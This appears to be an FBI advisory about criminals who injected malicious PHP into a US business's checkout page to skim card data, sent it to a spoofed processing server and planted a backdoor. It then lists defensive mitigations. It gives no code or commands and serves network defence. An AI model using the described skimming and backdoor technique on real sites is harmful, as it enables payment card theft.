As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server. The unidentified cyber actors also established backdoor access to the victim’s system by modifying two files within the checkout page. The FBI has identified and is sharing new indicators of compromise (IOCs), which may assist in network defense.
Recommended Mitigations:
- Update and patch all systems, to include operating systems, software, and any thirdparty code running as part of your website.
- Change default login credentials on all systems.
- Monitor requests performed against your e-commerce environment to identify possible malicious activity.
- Segregate and segment network systems to limit how easily cyber criminals can move from one to another.
- Secure all websites transferring sensitive information by using secure socket layer (SSL) protocol.
- Install third-party software/hardware from trusted sources. Coordinate with the manufacturer to ensure their security protocols prevent unauthorized access to data they store and/or process.
- Patch all systems for critical vulnerabilities, prioritizing timely patching of internetconnected servers for known vulnerabilities and software processing internet data, such as web browsers, browser plugins, and document readers.
- Actively scan and monitor web logs and web applications for unauthorized access, modification, and anomalous activities.
- Strengthen credential requirements and implement multifactor authentication to protect individual accounts.
- Conduct regular backups to reduce recovery time in the event of a compromise or cyber intrusion.
- Maintain an updated Incident Response Plan addressing cyber threat response.
The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this communication; the context, individual indicators, particularly those of a nondeterministic or ephemeral nature (such as filenames or IP addresses), may not be indicative of a compromise. Indicators should always be evaluated in light of your complete information security situation.
